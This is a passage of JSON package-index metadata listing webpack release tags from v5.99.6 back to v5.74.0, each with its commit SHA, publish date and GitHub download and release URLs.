2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"